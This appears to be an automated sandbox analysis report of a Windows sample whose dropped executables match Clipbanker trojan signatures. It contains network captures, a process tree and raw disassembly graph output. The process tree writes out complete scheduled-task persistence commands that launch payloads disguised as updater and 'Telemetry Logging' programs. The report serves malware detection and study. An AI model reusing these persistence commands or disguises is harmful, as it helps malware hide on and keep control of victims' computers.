                                                        2024-05-23 21:33:02 UTC152INData Raw: 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                        Data Ascii: "email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.449732104.26.4.154434944C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-05-23 21:33:02 UTC261OUTGET /demo/home.php?s=8.46.123.175 HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                        Host: db-ip.com
                                                        2024-05-23 21:33:02 UTC652INHTTP/1.1 200 OK
                                                        Date: Thu, 23 May 2024 21:33:02 GMT
                                                        Content-Type: application/json
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        x-iplb-request-id: AC4672AD:E13E_93878F2E:0050_664FB60E_EE5592B:7B63
                                                        x-iplb-instance: 59128
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J1CZ6BnGpbqGg5albB16Meulmy21cXJBpYVKVF%2FZfzxj96lueT7FG7TXMIattIwgtorMecf%2BMMU8g98c9HXNgDjrzJCDrBTuCbVQ1H6Zt9LxBY0czpZidRI9XQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8888297d0f3032d0-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-05-23 21:33:02 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                        Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                        2024-05-23 21:33:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:17:32:55
                                                        Start date:23/05/2024
                                                        Path:C:\Users\user\Desktop\file.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                        Imagebase:0x80000
                                                        File size:4'792'320 bytes
                                                        MD5 hash:EE40081ECC9D262A6AFB70E92D9092F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:1
                                                        Start time:17:32:56
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Imagebase:0x1c0000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:2
                                                        Start time:17:32:56
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                        Imagebase:0x5e0000
                                                        File size:45'984 bytes
                                                        MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        General

                                                        Target ID:3
                                                        Start time:17:33:10
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST
                                                        Imagebase:0x90000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:17:33:10
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:5
                                                        Start time:17:33:10
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST
                                                        Imagebase:0x90000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:17:33:10
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:7
                                                        Start time:17:33:11
                                                        Start date:23/05/2024
                                                        Path:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                                                        Imagebase:0x400000
                                                        File size:4'563'640 bytes
                                                        MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000007.00000002.1817763757.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000007.00000002.1817763757.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 66%, ReversingLabs
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:8
                                                        Start time:17:33:11
                                                        Start date:23/05/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe"
                                                        Imagebase:0x400000
                                                        File size:4'563'640 bytes
                                                        MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000008.00000002.1811428432.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000008.00000002.1811428432.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 66%, ReversingLabs
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:9
                                                        Start time:17:33:12
                                                        Start date:23/05/2024
                                                        Path:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe
                                                        Imagebase:0x400000
                                                        File size:4'563'640 bytes
                                                        MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000009.00000002.1816666835.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000009.00000002.1816666835.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Author: unknown
                                                        Reputation:moderate
                                                        Has exited:true

                                                        General

                                                        Target ID:10
                                                        Start time:17:33:12
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                        Imagebase:0x90000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:11
                                                        Start time:17:33:12
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:13
                                                        Start time:17:33:13
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                        Imagebase:0x90000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:14
                                                        Start time:17:33:13
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        General

                                                        Target ID:15
                                                        Start time:17:33:14
                                                        Start date:23/05/2024
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe
                                                        Imagebase:0x400000
                                                        File size:4'563'640 bytes
                                                        MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 0000000F.00000002.4085599610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 0000000F.00000002.4085599610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 66%, ReversingLabs
                                                        Has exited:false

                                                        General

                                                        Target ID:16
                                                        Start time:17:33:15
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                                                        Imagebase:0x90000
                                                        File size:187'904 bytes
                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:17
                                                        Start time:17:33:15
                                                        Start date:23/05/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:18
                                                        Start time:17:33:20
                                                        Start date:23/05/2024
                                                        Path:C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
                                                        Imagebase:0x400000
                                                        File size:4'563'640 bytes
                                                        MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000012.00000002.1889439352.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000012.00000002.1889439352.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 66%, ReversingLabs
                                                        Has exited:true

                                                        General

                                                        Target ID:21
                                                        Start time:17:33:28
                                                        Start date:23/05/2024
                                                        Path:C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
                                                        Imagebase:0x400000
                                                        File size:4'563'640 bytes
                                                        MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000015.00000002.1977139395.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000015.00000002.1977139395.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Author: unknown
                                                        Has exited:true

                                                        General

                                                        Target ID:22
                                                        Start time:17:33:37
                                                        Start date:23/05/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
                                                        Imagebase:0x400000
                                                        File size:4'563'640 bytes
                                                        MD5 hash:AF6E384DFABDAD52D43CF8429AD8779C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_Clipbanker_f9f9e79d, Description: unknown, Source: 00000016.00000002.2058620639.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Author: unknown
                                                        • Rule: Windows_Trojan_Clipbanker_787b130b, Description: unknown, Source: 00000016.00000002.2058620639.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Author: unknown
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 66%, ReversingLabs
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:8%
                                                          Dynamic/Decrypted Code Coverage:1.6%
                                                          Signature Coverage:1.9%
                                                          Total number of Nodes:1018
                                                          Total number of Limit Nodes:16
                                                          execution_graph 59030 6cf79357 59031 6cf79368 59030->59031 59167 6cf769c0 59031->59167 59033 6cf7ae62 SafeArrayDestroy 59034 6cf7ae68 59033->59034 59036 6cf7ae72 SafeArrayDestroy 59034->59036 59037 6cf7ae7b 59034->59037 59035 6cf793ac 59040 6cf769c0 11 API calls 59035->59040 59136 6cf78739 59035->59136 59036->59037 59038 6cf7ae85 SafeArrayDestroy 59037->59038 59039 6cf7ae8e 59037->59039 59038->59039 59041 6cf7aea1 59039->59041 59042 6cf7ae98 SafeArrayDestroy 59039->59042 59049 6cf7943a 59040->59049 59043 6cf7aeb4 59041->59043 59044 6cf7aeab SafeArrayDestroy 59041->59044 59042->59041 59045 6cf7aec7 59043->59045 59046 6cf7aebe SafeArrayDestroy 59043->59046 59044->59043 59257 6cfb948b 59045->59257 59046->59045 59048 6cf7aef5 59050 6cf794b1 SafeArrayGetLBound SafeArrayGetUBound 59049->59050 59049->59136 59051 6cf79658 59050->59051 59056 6cf794ef 59050->59056 59174 6cf6d920 59051->59174 59053 6cf794fd SafeArrayGetElement 59053->59056 59053->59136 59054 6cf7840e 59054->59136 59223 6cf6dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59054->59223 59056->59051 59056->59053 59056->59054 59056->59136 59057 6cf78441 59058 6cf784af SafeArrayGetLBound SafeArrayGetUBound 59057->59058 59057->59136 59059 6cf78616 59058->59059 59060 6cf784ed SafeArrayGetElement 59058->59060 59224 6cf6dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59059->59224 59070 6cf78518 59060->59070 59060->59136 59062 6cf7862b 59062->59136 59225 6cf6dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59062->59225 59063 6cf7968f 59066 6cf79794 SafeArrayGetLBound SafeArrayGetUBound 59063->59066 59063->59136 59065 6cf7864b 59065->59136 59226 6cf6dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59065->59226 59077 6cf79c5e 59066->59077 59092 6cf797d2 59066->59092 59068 6cf73a90 8 API calls 59068->59070 59069 6cf7866b 59069->59136 59227 6cf6dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59069->59227 59070->59059 59070->59060 59070->59068 59071 6cf797e3 SafeArrayGetElement 59071->59092 59071->59136 59073 6cf6d920 3 API calls 59080 6cf79cf8 59073->59080 59074 6cf7868a 59074->59136 59228 6cf6dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59074->59228 59076 6cf786aa 59078 6cf769c0 11 API calls 59076->59078 59076->59136 59077->59073 59079 6cf786cf 59078->59079 59081 6cf769c0 11 API calls 59079->59081 59079->59136 59083 6cf79d4f SafeArrayGetLBound SafeArrayGetUBound 59080->59083 59080->59136 59082 6cf786f5 59081->59082 59085 6cf769c0 11 API calls 59082->59085 59082->59136 59084 6cf79ec7 59083->59084 59093 6cf79d8d 59083->59093 59087 6cf6d920 3 API calls 59084->59087 59085->59136 59086 6cf79da0 SafeArrayGetElement 59086->59093 59086->59136 59088 6cf79f09 59087->59088 59090 6cf6d920 3 API calls 59088->59090 59088->59136 59089 6cf73a90 8 API calls 59089->59092 59094 6cf79f8b 59090->59094 59091 6cf73a90 8 API calls 59091->59093 59092->59054 59092->59071 59092->59077 59092->59089 59093->59084 59093->59086 59093->59091 59095 6cf6d920 3 API calls 59094->59095 59094->59136 59096 6cf7a01f 59095->59096 59097 6cf6d920 3 API calls 59096->59097 59096->59136 59098 6cf7a09b 59097->59098 59099 6cf7a1ac SafeArrayGetLBound SafeArrayGetUBound 59098->59099 59098->59136 59100 6cf7a7b3 59099->59100 59114 6cf7a1ea 59099->59114 59101 6cf6d920 3 API calls 59100->59101 59103 6cf7a7ce 59101->59103 59102 6cf7a1fd SafeArrayGetElement 59105 6cf7a815 59102->59105 59102->59114 59104 6cf6d920 3 API calls 59103->59104 59103->59136 59104->59105 59105->59136 59182 6cf764d0 VariantInit VariantInit VariantInit SafeArrayCreateVector 59105->59182 59107 6cf7a91d 59108 6cf764d0 109 API calls 59107->59108 59107->59136 59109 6cf7a950 59108->59109 59110 6cf764d0 109 API calls 59109->59110 59109->59136 59111 6cf7a983 59110->59111 59112 6cf764d0 109 API calls 59111->59112 59111->59136 59113 6cf7a9b6 59112->59113 59115 6cf764d0 109 API calls 59113->59115 59113->59136 59114->59100 59114->59102 59118 6cf73a90 8 API calls 59114->59118 59116 6cf7a9e9 59115->59116 59117 6cf764d0 109 API calls 59116->59117 59116->59136 59119 6cf7aa1c 59117->59119 59118->59114 59120 6cf764d0 109 API calls 59119->59120 59119->59136 59121 6cf7aa4f 59120->59121 59122 6cf764d0 109 API calls 59121->59122 59121->59136 59123 6cf7aa82 59122->59123 59124 6cf764d0 109 API calls 59123->59124 59123->59136 59125 6cf7aab5 59124->59125 59126 6cf764d0 109 API calls 59125->59126 59125->59136 59127 6cf7aae8 59126->59127 59128 6cf764d0 109 API calls 59127->59128 59127->59136 59129 6cf7ab1e 59128->59129 59130 6cf7abd0 59129->59130 59134 6cf7ac5a 59129->59134 59129->59136 59196 6cf72970 59130->59196 59229 6cf7d790 77 API calls 3 library calls 59134->59229 59136->59033 59136->59034 59137 6cf7ac37 59137->59136 59230 6cf61690 77 API calls 59137->59230 59139 6cf7ad36 59231 6cf650c0 77 API calls 59139->59231 59141 6cf7ad4d 59232 6cfb9bb5 59141->59232 59145 6cf7ad77 59252 6cf650c0 77 API calls 59145->59252 59147 6cf7ad82 59148 6cfb9bb5 77 API calls 59147->59148 59149 6cf7ad89 59148->59149 59150 6cf65050 77 API calls 59149->59150 59151 6cf7ada7 59150->59151 59152 6cfb9bb5 77 API calls 59151->59152 59153 6cf7adae 59152->59153 59154 6cf65050 77 API calls 59153->59154 59155 6cf7adcc 59154->59155 59253 6cf650c0 77 API calls 59155->59253 59157 6cf7add7 59158 6cfb9bb5 77 API calls 59157->59158 59159 6cf7ade1 59158->59159 59160 6cf65050 77 API calls 59159->59160 59161 6cf7adfb 59160->59161 59254 6cf650c0 77 API calls 59161->59254 59163 6cf7ae06 59255 6cf650c0 77 API calls 59163->59255 59165 6cf7ae11 59256 6cf62a40 327 API calls 59165->59256 59168 6cf769f3 59167->59168 59169 6cf76a01 SafeArrayGetLBound SafeArrayGetUBound 59167->59169 59168->59169 59170 6cf76a2a 59169->59170 59173 6cf76a92 59169->59173 59171 6cf76a30 SafeArrayGetElement 59170->59171 59170->59173 59265 6cf73990 8 API calls 59170->59265 59171->59170 59171->59173 59173->59035 59175 6cf6d936 59174->59175 59176 6cf6d944 SafeArrayCreateVector 59174->59176 59175->59176 59178 6cf6d95a 59176->59178 59179 6cf6d981 59176->59179 59177 6cf6d960 SafeArrayPutElement 59177->59178 59177->59179 59178->59177 59178->59179 59180 6cf6d9d5 59179->59180 59181 6cf6d9ce SafeArrayDestroy 59179->59181 59180->59063 59181->59180 59183 6cf76554 59182->59183 59184 6cf7655c SafeArrayPutElement VariantClear 59182->59184 59183->59184 59185 6cf76584 SafeArrayPutElement VariantClear 59184->59185 59195 6cf76655 59184->59195 59189 6cf765cd 59185->59189 59185->59195 59187 6cf76665 SafeArrayDestroy 59188 6cf7666c VariantClear VariantClear VariantClear 59187->59188 59188->59107 59189->59195 59266 6cf6db30 VariantInit SafeArrayCreateVector SafeArrayPutElement 59189->59266 59191 6cf7663a 59191->59195 59270 6cf756b0 59191->59270 59195->59187 59195->59188 59201 6cf729c3 59196->59201 59197 6cf72d21 59197->59136 59210 6cf7d2e0 59197->59210 59198 6cf72d1a SafeArrayDestroy 59198->59197 59199 6cf729ee SafeArrayGetLBound SafeArrayGetUBound 59200 6cf72a20 SafeArrayGetElement 59199->59200 59205 6cf72c53 59199->59205 59200->59201 59200->59205 59201->59197 59201->59199 59201->59200 59202 6cf72ab6 VariantInit 59201->59202 59203 6cf72c8b VariantClear VariantClear 59201->59203 59204 6cf72b3a VariantInit 59201->59204 59201->59205 59206 6cf72d3a VariantClear VariantClear VariantClear 59201->59206 59207 6cf72cb6 VariantClear VariantClear VariantClear 59201->59207 59208 6cf72bf9 VariantClear VariantClear VariantClear 59201->59208 59202->59201 59203->59205 59204->59201 59205->59197 59205->59198 59206->59205 59207->59205 59208->59201 59211 6cfb9bb5 77 API calls 59210->59211 59212 6cf7d32f 59211->59212 59213 6cf7d3db 59212->59213 59215 6cf7d33e 59212->59215 59299 6cfb9533 66 API calls std::exception::_Copy_str 59213->59299 59288 6cf7c530 VariantInit VariantInit SafeArrayCreateVector 59215->59288 59216 6cf7d3ed 59300 6cfbac75 RaiseException 59216->59300 59218 6cf7d404 59221 6cfb948b __ehhandler$___std_fs_change_permissions@12 5 API calls 59222 6cf7d3d5 59221->59222 59222->59137 59223->59057 59224->59062 59225->59065 59226->59069 59227->59074 59228->59076 59229->59137 59230->59139 59231->59141 59235 6cfb9bbf 59232->59235 59233 6cfb9d66 _malloc 66 API calls 59233->59235 59234 6cf7ad5d 59244 6cf65050 59234->59244 59235->59233 59235->59234 59238 6cfb9bdb std::exception::exception 59235->59238 59346 6cfbc86e DecodePointer 59235->59346 59242 6cfb9c19 59238->59242 59347 6cfb9af4 76 API calls __cinit 59238->59347 59239 6cfb9c23 59349 6cfbac75 RaiseException 59239->59349 59348 6cfb95c1 66 API calls std::exception::operator= 59242->59348 59243 6cfb9c34 59245 6cf65091 59244->59245 59246 6cf6505d 59244->59246 59249 6cf6509d 59245->59249 59351 6cf65110 77 API calls std::_Xinvalid_argument 59245->59351 59246->59245 59247 6cf65066 59246->59247 59250 6cf6507a 59247->59250 59350 6cf65110 77 API calls std::_Xinvalid_argument 59247->59350 59249->59145 59250->59145 59252->59147 59253->59157 59254->59163 59255->59165 59256->59136 59258 6cfb9493 59257->59258 59259 6cfb9495 IsDebuggerPresent 59257->59259 59258->59048 59352 6cfc0036 59259->59352 59262 6cfbce7e SetUnhandledExceptionFilter UnhandledExceptionFilter 59263 6cfbcea3 GetCurrentProcess TerminateProcess 59262->59263 59264 6cfbce9b __call_reportfault 59262->59264 59263->59048 59264->59263 59265->59170 59269 6cf6db8c 59266->59269 59267 6cf6dbf7 VariantClear 59267->59191 59268 6cf6dbf0 SafeArrayDestroy 59268->59267 59269->59267 59269->59268 59271 6cf756f4 59270->59271 59273 6cf756e0 59270->59273 59275 6cf75744 59271->59275 59276 6cf7570d VariantInit VariantCopy 59271->59276 59286 6cf757c0 81 API calls std::_Xinvalid_argument 59271->59286 59273->59271 59285 6cf757c0 81 API calls std::_Xinvalid_argument 59273->59285 59277 6cf76880 VariantInit VariantInit 59275->59277 59276->59271 59276->59275 59287 6cfb91e1 59277->59287 59279 6cf768cd SafeArrayCreateVector SafeArrayPutElement VariantClear 59280 6cf76913 SafeArrayPutElement 59279->59280 59284 6cf7692d 59279->59284 